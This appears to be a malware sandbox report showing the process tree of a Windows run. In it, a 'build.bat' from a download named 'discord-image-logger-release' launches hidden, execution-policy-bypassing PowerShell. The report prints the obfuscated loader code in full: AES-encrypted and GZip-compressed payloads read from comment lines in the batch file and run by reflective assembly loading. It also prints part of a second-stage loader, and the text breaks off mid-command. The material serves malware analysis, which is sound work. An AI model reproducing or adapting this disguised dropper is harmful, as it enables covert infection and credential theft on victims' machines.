C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | PID:2780
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | PID:2804
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker | PID:2860
C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding | PID:2768
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | PID:3416
C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | PID:3524
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://youtube.com | PID:3228
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff764a46f8,0x7fff764a4708,0x7fff764a4718 | PID:3360
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:2 | PID:3184
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3 | PID:4556
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2960 /prefetch:8 | PID:3576
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1 | PID:4200
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1 | PID:4856
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:1 | PID:3100
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:1 | PID:1384
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5116 /prefetch:8 | PID:2268
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5368 /prefetch:8 | PID:4256
    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8 | PID:1196
    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8 | PID:2140
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1 | PID:2568
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1 | PID:3340
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1 | PID:1828
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1 | PID:2932
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:1 | PID:3712
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1 | PID:904
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1 | PID:3316
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1 | PID:2928
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1 | PID:3180
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2116 /prefetch:1 | PID:1096
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1 | PID:3704
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1 | PID:2928
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1 | PID:3828
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5604 /prefetch:8 | PID:5108
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1 | PID:5032
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6344 /prefetch:8 | PID:1340
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5244 /prefetch:2 | PID:5572
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=904 /prefetch:1 | PID:7076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4004 /prefetch:83⤵PID:7088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:13⤵PID:6240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 /prefetch:83⤵PID:5824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=180 /prefetch:83⤵PID:6244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1720 /prefetch:13⤵PID:6340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2504 /prefetch:13⤵PID:5568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:13⤵PID:6808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4136 /prefetch:83⤵PID:6304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3384 /prefetch:83⤵PID:6952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:13⤵PID:1276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat" "2⤵
- Drops file in Windows directory
PID:1976 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1728
-
-
C:\Windows\system32\net.exenet session3⤵PID:448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:1812
-
-
-
C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe"build.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function iwkhR($DITIA){ $XVnki=[System.Security.Cryptography.Aes]::Create(); $XVnki.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XVnki.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XVnki.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8ehdS6ppW71xL6mDjAeXsyQHYKmv0CPtd6Kn4aXzt4='); $XVnki.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hx3HwApb8t08fxY/Go7cSw=='); $LrZFK=$XVnki.CreateDecryptor(); $return_var=$LrZFK.TransformFinalBlock($DITIA, 0, $DITIA.Length); $LrZFK.Dispose(); $XVnki.Dispose(); $return_var;}function kOuIB($DITIA){ $DbpkU=New-Object System.IO.MemoryStream(,$DITIA); $qZtjl=New-Object System.IO.MemoryStream; $JMgSB=New-Object System.IO.Compression.GZipStream($DbpkU, [IO.Compression.CompressionMode]::Decompress); $JMgSB.CopyTo($qZtjl); $JMgSB.Dispose(); $DbpkU.Dispose(); $qZtjl.Dispose(); $qZtjl.ToArray();}function ZkZVP($DITIA,$AoxAJ){ $HLgZK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$DITIA); $UXpIZ=$HLgZK.EntryPoint; $UXpIZ.Invoke($null, $AoxAJ);}$zVdRm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat').Split([Environment]::NewLine);foreach ($BYfmw in $zVdRm) { if ($BYfmw.StartsWith(':: ')) { $Rndkm=$BYfmw.Substring(3); break; }}$FMGlq=[string[]]$Rndkm.Split('\');$IgKIL=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[0])));$voFjb=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[1])));ZkZVP $voFjb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZkZVP $IgKIL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:700 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function PprBf($RmAux){ $VbRCn=[System.Security.Cryptography.Aes]::Create(); $VbRCn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VbRCn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VbRCn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU='); $VbRCn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ=='); $nMOmr=$VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')(); $WZWky=$nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmAux, 0, $RmAux.Length); $nMOmr.Dispose(); $VbRCn.Dispose(); $WZWky;}function SPSlI($RmAux){ $qrnaZ=New-Object System.IO.MemoryStream(,$RmAux); $RJeXu=New-Object System.IO.MemoryStream; $eBeQA=New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::Decompress); $eBeQA.CopyTo($RJeXu); $eBeQA.Dispose(); $qrnaZ.Dispose(); $RJeXu.Dispose(); $RJeXu.ToArray();}function aBEzg($RmAux,$ZKJrf){ $oxAUi=[System.Reflection.Assembly]::Load([byte[]]$RmAux); $qVnjt=$oxAUi.EntryPoint; $qVnjt.Invoke($null, $ZKJrf);}$VbRCn1 = New-Object System.Security.Cryptography.AesManaged;$VbRCn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$MSWRP = $VbRCn1.('rotpyrceDetaerC'[-1..-15] -join '')();$NUNZn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iZ8jPKmNkFdL1A6USwSGLA==');$NUNZn = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn, 0, $NUNZn.Length);$NUNZn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn);$cBXxm = 
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('302eS2iAhetJuvIY9pVgKOFxBony5LGiLQi+lPOo9Ig=');$cBXxm = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBXxm, 0, $cBXxm.Length);$cBXxm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cBXxm);$GlTUf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2/VItTApDmqYld7UNbITmw==');$GlTUf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlTUf, 0, $GlTUf.Length);$GlTUf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GlTUf);$YQTnf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y7u8mHn+uE8DouxrXvlfhI8HvaFVabiSu9wW1NQnVBW3d+pbXbyeWiMzHsShgQVzWTccLy3R/sL1Fgo2ngbj1Xyhdd8QHKlT7xJYowF1jSmMT/YNyn61oZ4EBOdIILtHY76iwoY89T/0NXOlbVQSqG6f76Tvu+/ljtRIjK68ygJujUjyjF9W1UFNXnjlbvKaQ0BTSj7AUpwYBspcSQUSWqlV4JZYmfkLzrzzafMFwHzW6zgfk8rU5wxN2vDnC7yji58n7rylZaggz4+okuyhoMrfM4k/T/mqHJ8VdUFO8xpIeX3hePuaZ5Z58y1CyCEoFhGVyjfm3AnZl3fgFnvsWSS15RXMq5KXGV3I38NkazdqvV05jjZTTECaOwsRwu2zLdJ29XVcSC4yPm3wAT5LZe+YH34hMw11+Tv5n+xxqwY=');$YQTnf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YQTnf, 0, $YQTnf.Length);$YQTnf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YQTnf);$CPWdf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vGf9ES1PdsfKW8Swn9bI3w==');$CPWdf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CPWdf, 0, $CPWdf.Length);$CPWdf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CPWdf);$igAgV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UiHcuo7jcw/WkburfrLBQ==');$igAgV = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igAgV, 0, $igAgV.Length);$igAgV = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igAgV);$ZYOXs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hDpsuPmELCzhYTCugvhrpA==');$ZYOXs = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZYOXs, 0, $ZYOXs.Length);$ZYOXs = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZYOXs);$cmXWw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Duasd/EcBtQj2cZsgiwg+Q==');$cmXWw = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cmXWw, 0, $cmXWw.Length);$cmXWw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cmXWw);$qpchR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KDa4G8PrmTjfH/8cqC5WDg==');$qpchR = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qpchR, 0, $qpchR.Length);$qpchR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qpchR);$NUNZn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkNHx2c/PIn2isifrSOkpw==');$NUNZn0 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn0, 0, $NUNZn0.Length);$NUNZn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn0);$NUNZn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QCQIFS3Mnpd27lKyoiLRsA==');$NUNZn1 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn1, 0, $NUNZn1.Length);$NUNZn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn1);$NUNZn2 = 